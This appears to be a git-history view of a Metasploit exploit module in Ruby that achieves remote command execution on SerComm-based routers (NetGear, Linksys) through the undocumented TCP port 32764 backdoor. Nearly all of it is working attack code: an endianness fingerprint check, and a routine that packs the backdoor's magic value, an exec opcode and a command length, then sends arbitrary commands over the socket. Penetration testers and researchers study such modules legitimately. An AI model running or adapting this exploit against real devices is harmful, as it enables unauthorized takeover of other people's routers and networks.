metasploit-framework/modules/exploits/linux/misc/sercomm_exec.rb

129 lines
3.2 KiB
Ruby
Raw Normal View History

2014-01-09 13:51:42 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2014-01-09 13:51:42 +00:00
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerEcho
def initialize(info={})
super(update_info(info,
'Name' => "SerComm Device Remote Code Execution",
'Description' => %q{
2014-01-09 13:51:42 +00:00
This module will cause remote code execution on several SerComm devices.
These devices typically include routers from NetGear and Linksys.
2014-01-13 19:57:34 +00:00
This module was tested successfully against the NetGear DG834 series
ADSL modem router.
},
'License' => MSF_LICENSE,
'Author' =>
[
2014-01-09 13:51:42 +00:00
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
],
'Payload' =>
{
2014-01-09 13:51:42 +00:00
'Space' => 10000, # Could be more, but this should be good enough
'DisableNops' => true
},
2014-01-09 13:51:42 +00:00
'Platform' => 'linux',
'Privileged' => false,
'Targets' =>
[
2014-01-09 13:51:42 +00:00
['Linux MIPS Big Endian',
{
2014-01-09 14:01:11 +00:00
'Arch' => ARCH_MIPSBE
2014-01-09 13:51:42 +00:00
}
],
['Linux MIPS Little Endian',
{
2014-01-09 14:01:11 +00:00
'Arch' => ARCH_MIPSLE
2014-01-09 13:51:42 +00:00
}
],
],
2014-01-09 13:51:42 +00:00
'DefaultTarget' => 0,
'References' =>
[
2014-01-09 13:51:42 +00:00
[ 'OSVDB', '101653' ],
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
],
'DisclosureDate' => "Dec 31 2013" ))
register_options(
[
2014-01-09 14:01:11 +00:00
Opt::RPORT(32764)
], self.class)
end
def check
2014-01-09 21:17:13 +00:00
fprint = endian_fingerprint
case fprint
when 'BE'
print_status("Detected Big Endian")
return Msf::Exploit::CheckCode::Vulnerable
when 'LE'
print_status("Detected Little Endian")
return Msf::Exploit::CheckCode::Vulnerable
end
return Msf::Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager(:noargs => true)
end
2014-01-09 21:17:13 +00:00
def endian_fingerprint
begin
connect
2014-01-09 13:51:42 +00:00
sock.put(rand_text(5))
res = sock.get_once
disconnect
2014-01-09 21:17:13 +00:00
if res && res.start_with?("MMcS")
return 'BE'
2014-01-09 21:17:13 +00:00
elsif res && res.start_with?("ScMM")
return 'LE'
end
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e.class}: #{e}")
end
2014-01-09 13:51:42 +00:00
return nil
end
def execute_command(cmd, opts)
vprint_debug(cmd)
# Get the length of the command, for the backdoor's command injection
2014-01-09 13:51:42 +00:00
cmd_length = cmd.length
2014-01-09 13:51:42 +00:00
# 0x53634d4d => Backdoor code
# 0x07 => Exec command
# cmd_length => Length of command to execute, sent after communication struct
2014-01-13 21:04:23 +00:00
# According to @mandreko, probably targets specifics must be had into account
# when dealing with the target endiangess... work in progress
if target.arch.include?(ARCH_MIPSBE)
data = [0x4d4d6353, 0x07, cmd_length].pack("NVV")
else
data = [0x4d4d6353, 0x07, cmd_length].pack("VNN")
end
connect
# Send command structure followed by command text
sock.put(data+cmd)
disconnect
Rex.sleep(1)
end
end